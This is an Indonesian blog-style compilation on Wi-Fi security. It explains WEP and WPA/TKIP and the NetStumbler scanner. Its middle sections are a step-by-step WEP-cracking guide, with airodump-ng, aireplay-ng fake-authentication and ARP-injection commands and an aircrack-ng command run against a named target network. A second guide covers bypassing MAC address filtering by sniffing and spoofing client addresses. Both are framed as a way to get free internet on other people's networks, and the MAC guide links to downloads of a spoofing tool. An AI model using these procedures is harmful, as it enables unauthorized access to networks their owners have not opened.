Keamanan Wireless dengan metode Wired Equivalent Privacy (WEP)

 

WEP merupakan standart keamanan & enkripsi pertama yang digunakan pada wireless, WEP (Wired Equivalent Privacy) adalah suatu metoda pengamanan jaringan nirkabel, disebut juga dengan Shared Key Authentication. Shared Key Authentication adalah metoda otentikasi yang membutuhkan penggunaan WEP. Enkripsi WEP menggunakan kunci yang dimasukkan (oleh administrator) ke client maupun access point. Kunci ini harus cocok dari yang diberikan akses point ke client, dengan yang dimasukkan client untuk authentikasi menuju access point, dan WEP mempunyai standar 802.11b.

 

 

Proses Shared Key Authentication:

1. Client meminta asosiasi ke access point, langkah ini sama seperti Open System Authentication.

2. Access point mengirimkan text challenge ke client secara transparan.

3. Client akan memberikan respon dengan mengenkripsi text challenge dengan menggunakan kunci WEP dan mengirimkan kembali ke access point.

4. Access point memberi respon atas tanggapan client, akses point akan melakukan decrypt terhadap respon enkripsi dari client untuk melakukan verifikasi bahwa text challenge dienkripsi dengan menggunakan WEP key yang sesuai. Pada proses ini, access point akan menentukan apakah client sudah memberikan kunci WEP yang sesuai. Apabila kunci WEP yang diberikan oleh client sudah benar, maka access point akan merespon positif dan langsung meng-authentikasi client. Namun bila kunci WEP yang dimasukkan client adalah salah, maka access point akan merespon negatif dan client tidak akan diberi authentikasi. Dengan demikian, client tidak akan terauthentikasi dan tidak terasosiasi.

 

 

 

WEP memiliki berbagai kelemahan antara lain :

1. Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.

2. WEP menggunakan kunci yang bersifat statis

3. Masalah initialization vector (IV) WEP

4. Masalah integritas pesan Cyclic Redundancy Check (CRC-32)

 

 

WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada kunci WEP 64 bit hanya 40 bit, sedang 24bit merupakan Inisialisasi Vektor (IV). Demikian juga pada kunci WEP 128 bit, kunci rahasia terdiri dari 104bit.

Serangan-serangan pada kelemahan WEP antara lain :

 

 

1. Serangan terhadap kelemahan inisialisasi vektor (IV), sering disebut FMS attack. FMS singkatan dari nama ketiga penemu kelemahan IV yakni Fluhrer, Mantin, dan Shamir. Serangan ini dilakukan dengan cara mengumpulkan IV yang lemah sebanyak-banyaknya. Semakin banyak IV lemah yang diperoleh, semakin cepat ditemukan kunci yang digunakan

2. Mendapatkan IV yang unik melalui packet data yang diperoleh untuk diolah untuk proses cracking kunci WEP dengan lebih cepat. Cara ini disebut chopping attack, pertama kali ditemukan oleh h1kari. Teknik ini hanya membutuhkan IV yang unik sehingga mengurangi kebutuhan IV yang lemah dalam melakukan cracking WEP.

3. Kedua serangan diatas membutuhkan waktu dan packet yang cukup, untuk mempersingkat waktu, para hacker biasanya melakukan traffic injection. Traffic Injection yang sering dilakukan adalah dengan cara mengumpulkan packet ARP kemudian mengirimkan kembali ke access point. Hal ini mengakibatkan pengumpulan initial vektor lebih mudah dan cepat. Berbeda dengan serangan pertama dan kedua, untuk serangan traffic injection,diperlukan spesifikasi alat dan aplikasi tertentu yang mulai jarang ditemui di toko-toko, mulai dari chipset, versi firmware, dan versi driver serta tidak jarang harus melakukan patching terhadap driver dan aplikasinya.

 

 

Cara Ngehack WEP 128 bit Wi-Fi

 

Pada dasarnya setingan keamanan pada Akses Point (AP) terdiri dari beberapa mode, tetapi rata-rata menggunakan setingan yang simple untuk memudahkan pengaksessan. Karena terkadang semakin tinggi tingkat keamanan maka tingkat kenyamanan semakin berkurang. WEP adalah Wired Eqivalent Privacy, yang panjang key 64 bitnya hanya 10 digit bilangan heksadesimal atau 5 digit alpha-numeric, sedangkan untuk 128 bit key terdiri dari 26 digit heksadesimal atau 13 digit alpha-numeric. Algoritma pemograman wep tergolong ke dalam algoritma RC4, dimana terdapat kelemahan pada ekripsi ini yaitu adanya perulangan byte sehingga memungkinkan untuk dicrack jika variable ivs nya mencukupi.Saat melakukan proses hacking wep, menggunakan OS linuk turunan slackware yaitu backtrack versi 2.0 Final, dan menggunakan laptop Compaq V3103TU Presario V3000 dan menggunakan usb wireless adapter DWL G-122 rec C v.3.0.Secara umum langkah-langkahnya adalah sebagai berikut:

1. Jalankan OS Back Track v.2.0 Final dengan Laptop. Lalu cek konfigurasi adapater usb wifi dengan meggunakan shell.Ketikkan:

Ifconfig rausb0

Iwconfig rausb0

2. Setelah konfigurasi selesai, lalu jalankan airodump-ng untuk mengetahui channel berapa yang aktif, apa nama ssidnya, mac /client berapa saja yang sudah konek, ada tidaknya filrtering mac, yang tentunya untuk memudahkan kita melakukan monitoringdengan menggunakan shell ketikkan:

airodump-ng rausb0

3. Setelah mengetahui target berada di channel berapa, ssid nya apa, essid nya apa, ada tidaknya client yang konek, maka batalkan airodump-ng dari shell dengan menekan control+C. lalu misalnya kita ingin menyerang essid CIPUTIH bssid 00:18:f8:36:83:47 operasinya di channel 8, maka untuk menangkap paket yang dipancarkan oleh AP (Access Point) tersebut maka jalankan perintah:

iwconfig rausb0 mode monitor channel 8

airodump-ng — channel 8 –ivs -w namafile rausb0

shell ini jangan ditutup sampai mendapatkan key wep pada langkah aircrack-ng

4. Setelah itu, jika aktivitas lan sedikit, artinya tidak ada client yang connect, harus menggunakan Fake Authentification dengan membuka shell baru, lalu ketikkan:

Aireplay-ng -1 -30 -e CIPUTIH —a 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0

Lakukan fake authentification sampai muncul balasan jawaban:Authentification successfulKeep live sending packetLakukan terus sampai mendapatkan key wep pada langkah aircrack-ng

5 Lalu jalan shell yang lain untuk melakukan injeksi arp request (dalam hal ini hanya card tertentu saja yang mendukung untuk melakukan injeksi), jalankan command:

Aireplay-ng -3 —b 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0

Lalu tinggal menunggu agar paket arp injeksi terkirim dan paket arp request diterima, paket yang diterima berupa paket ivs ini akan tersimpan dalam file pertama tadi di atas ketika menjalan shell airodump-ng — channel 8 –ivs -w namafile rausb0

6. Untuk ngecrack password wep, sambil menunggu paket yang terkumpul, jalan shell baru ketikkan

aircrack-ng —e CIPUTIH -b 00:18:f8:36:83:47 (namafile).ivs

lalu aircrack-ng ini akan mencari semua kemungkinan key wepnya.Tunggu sampai mendapat display

Key Found (B1:92:27:EF:6E) Probability 100%7. matikan shell airodump-ng, aireplay-ng, lalu buka shell baru. Lalu lakukan otentifikasi dengan cara:

iwconfig rausb0 mode managed —e CIPUTIH key B1:92:27:EF:6E

lalu lakukan otomatisasi dhcp dengan mengetikkan perintah:dhcpcd rausb0

lalu lakukan ping ke salah satu web site misalnya:ping yahoo.com

kalo jawaban dari ping TTL=bla bla berarti anda sudah terkoneksi ke internet

 

Untuk membobol wep 64 bit biasanya banyaknya paket yang dibutuhkan sekitar 250 ribu ivs lebih, untuk wep 128 bit 500 ribu atau lebih.

 

Keamanan wireless dengan metode WI-FI Protected Accsess (WPA)

 

Merupakan rahasia umum jika WEP (Wired Equivalent Privacy) tidak lagi mampu diandalkan untuk menyediakan koneksi nirkabel (wireless) yang aman dari ulah orang usil atau ingin mengambil keuntungan atas apa yang kita miliki—dikenal dengan jargon hackers. Tidak lama setelah proses pengembangan WEP, kerapuhan dalam aspek kriptografi muncul.

Berbagai macam penelitian mengenai WEP telah dilakukan dan diperoleh kesimpulan bahwa walaupun sebuah jaringan wireless terlindungi oleh WEP, pihak ketiga (hackers) masih dapat membobol masuk. Seorang hacker yang memiliki perlengkapan wireless seadanya dan peralatan software yang digunakan untuk mengumpulkan dan menganalisis cukup data, dapat mengetahui kunci enkripsi yang digunakan.

 

Menyikapi kelemahan yang dimiliki oleh WEP, telah dikembangkan sebuah teknik pengamanan baru yang disebut sebagai WPA (WiFI Protected Access). Teknik WPA adalah model kompatibel dengan spesifikasi standar draf IEEE 802.11i. Teknik ini mempunyai beberapa tujuan dalam desainnya, yaitu kokoh, interoperasi, mampu digunakan untuk menggantikan WEP, dapat diimplementasikan pada pengguna rumahan atau corporate, dan tersedia untuk publik secepat mungkin. Adanya WPA yang “menggantikan” WPE, apakah benar perasaan “tenang” tersebut didapatkan? Ada banyak tanggapan pro dan kontra mengenai hal tersebut. Ada yang mengatakan, WPA mempunyai mekanisme enkripsi yang lebih kuat. Namun, ada yang pesimistis karena alur komunikasi yang digunakan tidak aman, di mana teknik man- in-the-middle bisa digunakan untuk mengakali proses pengiriman data. Agar tujuan WPA tercapai, setidaknya dua pengembangan sekuriti utama dilakukan. Teknik WPA dibentuk untuk menyediakan pengembangan enkripsi data yang menjadi titik lemah WEP, serta menyediakan user authentication yang tampaknya hilang pada pengembangan konsep WEP.

Teknik WPA didesain menggantikan metode keamanan WEP, yang menggunakan kunci keamanan statik, dengan menggunakan TKIP (Temporal Key Integrity Protocol) yang mampu secara dinamis berubah setelah 10.000 paket data ditransmisikan. Protokol TKIP akan mengambil kunci utama sebagai starting point yang kemudian secara reguler berubah sehingga tidak ada kunci enkripsi yang digunakan dua kali. Background process secara otomatis dilakukan tanpa diketahui oleh pengguna. Dengan melakukan regenerasi kunci enkripsi kurang lebih setiap lima menit, jaringan WiFi yang menggunakan WPA telah memperlambat kerja hackers yang mencoba melakukan cracking kunci terdahulu.

 

Walaupun menggunakan standar enkripsi 64 dan 128 bit, seperti yang dimiliki teknologi WEP, TKIP membuat WPA menjadi lebih efektif sebagai sebuah mekanisme enkripsi. Namun, masalah penurunan throughput seperti yang dikeluhkan oleh para pengguna jaringan wireless seperti tidak menemui jawaban dari dokumen standar yang dicari. Sebab, masalah yang berhubungan dengan throughput sangatlah bergantung pada hardware yang dimiliki, secara lebih spesifik adalah chipset yang digunakan. Anggapan saat ini, jika penurunan throughput terjadi pada implementasi WEP, maka tingkat penurunan tersebut akan jauh lebih besar jika WPA dan TKIP diimplementasikan walaupun beberapa produk mengklaim bahwa penurunan throughput telah diatasi, tentunya dengan penggunaan chipset yang lebih besar kemampuan dan kapasitasnya.

Proses otentifikasi WPA menggunakan 802.1x dan EAP (Extensible Authentication Protocol). Secara bersamaan, implementasi tersebut akan menyediakan kerangka kerja yang kokoh pada proses otentifikasi pengguna. Kerangka-kerja tersebut akan melakukan utilisasi sebuah server otentifikasi terpusat, seperti RADIUS, untuk melakukan otentifikasi pengguna sebelum bergabung ke jaringan wireless. Juga diberlakukan mutual authentification, sehingga pengguna jaringan wireless tidak secara sengaja bergabung ke jaringan lain yang mungkin akan mencuri identitas jaringannya.

Mekanisme enkripsi AES (Advanced Encryption Standard) tampaknya akan diadopsi WPA dengan mekanisme otentifikasi pengguna. Namun, AES sepertinya belum perlu karena TKIP diprediksikan mampu menyediakan sebuah kerangka enkripsi yang sangat tangguh walaupun belum diketahui untuk berapa lama ketangguhannya dapat bertahan.

 

Membobol MAC Address Filter

 

1. Jalankan Live CD Distro Linux BackTrack

2, masukkan username “root”, lalu masukkan

password “toor”.

2. Setelah muncul prompt, ketikkan “startx”.

3. Setelah muncul desktop environment KDE, klik tombol “K” (di pojok kiri bawah). Pilih

BackTrack ? Radio Network Analysis -> 80211 ? Analyser ? Kismet.

4. Lalu muncul window “Select Network Device”, pilih “wifi0”. Klik “OK”.

5.Muncul tampilan Kismet, secara otomatis Kismet akan mencari wireless client yang sedang

aktif. Bila ditemukan wireless client yang aktif tetapi tidak terhubung dengan jaringan,

maka akan muncul pesan “ALERT: Suspicious client 00:02:6F:37:08:20 – probing

networks but never participating.”

6. Bila Kismet berhasil menemukan Access Point yang aktif, maka akan muncul pesan “Found

IP 192.168.2.1 for kotik::00:0E:2E:C2:2C:0E via ARP”.

Keterangan:

kotik -> nama SSID

 

7.Tutup Kismet, lalu buka console untuk menjalankan tools scanning yang lain, yakni

airodump.

Keterangan:

Bila kita menggunakan program scanning yang lain, biasanya program pertama akan

membuat driver wireless kita “rusak”. Untuk dapat digunakan pada program yang kedua,

kita perlu memperbaiki driver tersebut (dimatikan lalu dihidupkan kembali).

8. Cara memperbaiki driver, ketik:

#airmon-ng -> untuk mengecek interface yang tersedia.

Matikan driver “ath0” dan “ath1” dengan mengetik:

#airmon-ng stop ath0

#airmon-ng stop ath1 -> bila interface ath1 ada.

9.Mengaktifkan driver yang baru, ketik:

#airmon-ng start wifi0

10. Bila diketikkan perintah #iwconfig , maka muncul informasi “ath0” sudah aktif dengan

Mode=Monitor.

11.Berikutnya, ketik #airodump-ng ath0

12.Dengan demikian maka kesimpulan bahwa dengan airodump mendapatkan hasil scanning

MAC Address Client yang lebih cepat dibandingkan dengan menggunakan Kismet. Tetapi

Client IP Address tidak bisa didapatkan, kecuali menggunakan Kismet.

13.Kita juga dapat menggunakan program K-MAC(atau anda bisa merubah MAC Address

melalui regedit) yang di-install pada windows untuk merubah MAC-Address Wireless kita

menjadi MAC-Address salah satu client yang terdaftar pada MAC Address Filtering.

14.Yang perlu dilakukan adalah mencari informasi MAC-Address client dengan mengunakan

Kismet atau airodump, catat MAC-Address tersebut, lalu jalankan K-MAC di windows dan

ubah MAC-Addressnya.

15. Setelah restart komputer/laptop anda, dan mulai berinternet gratis deh……..

 

K-MAC silahkan download

http://indoupload.net/files/8318/k-mac.zip

Atau

http://www.evilshare.com/73e468a4-7003-102c-952c-000b6aa2a5f8

 

 

NETSTUMBLER

 

Tip wifi kali ini mempersembahkan tool atau software freeware Netstumbler yang amat populer di kalangan aktivis wireless, tool ini berjalan di lingkungan Windows, dengan tool ini kita bisa mendeteksi sinyal jaringan wifi yang lagi aktif, dengan mengetahui sinyal-sinyal yang aktif saat ini, kita bisa memantau besarnya interferensi di lingkungan kita berada, Netstumbler ini juga bisa menangkap sinyal wifi yang lebih jauh dari yang bisa ditangkap oleh software monitoring bawaan device wifi standard.

Umumnya tool ini dipergunakan untuk keperluan hacking, pengujian konfigurasi jaringan, survey besarnya interferensi, menemukan tempat yang sepi dari jaringan wifi, dan memposisikan ketepatan arah antena(pointing).

Sayangnya netstumbler ini bisa disalah gunakan oleh orang untuk menemukan jaringan wifi yang rentan securitynya, lalu dia bisa menggunakan sedikit upaya untuk membobolnya, jadi bisa internetan gratis nih. Oleh karena itu pergunakan langkah security yang maksimal pada akses point anda, bila akses poin anda security WEP dan WPA nya aktif, maka Netstumbler akan memunculkan gambar gembok pada sinyal wifi yang WEP atau WPA nya aktif, so jangan coba-coba meremehkan perkara.

Disamping itu Netstumbler bisa melakukan monitoring channel-channel yang dipergunakan, kekuatan sinyal wifi, menampilkan SSID yang terdeteksi. Netstumbler juga bisa disandingkan dengan perangkat GPS, alhasil kita bisa memetakan jaringan wifi yang berada pada satu tempat, ini biasanya dilakukan sambil berjalan, juga melaporkan MAC Address akses poin plus frekuensi operasinya, mencatat level noise, serta perbandingannya dengan level kekuatan sinyal.

So tip wifi kali ini memberi saran kepada anda untuk men-disable broadcast SSID anda agar jaringan wifi anda tersembunyi, tidak bisa terdeteksi lagi oleh Netstumbler atau tool lainnya yang sejenis (meskipun demikian ada beberapa tool yang mampu memonitor SSID yang sudah ter-hidden/tersembunyi), tool buatan Marius Milner ini bisa didownload gratis di www.netstumbler.com .

 

Sumber:     http://darezfadly.blogspot.com

        
 

http://butengs.wordpress.com/2009/12/08/tips-dan-trik-membobol-mac-address/

 

http://www.remoteexploit.org/

 

http://www.echo.or.id/

    
 

http://www.netstumbler.org/

    
 

http://www.aircrackng.org/

 

http://www.swik.net/

 

http://www.securityfocus.com/

 

http://www.wififorum.pl/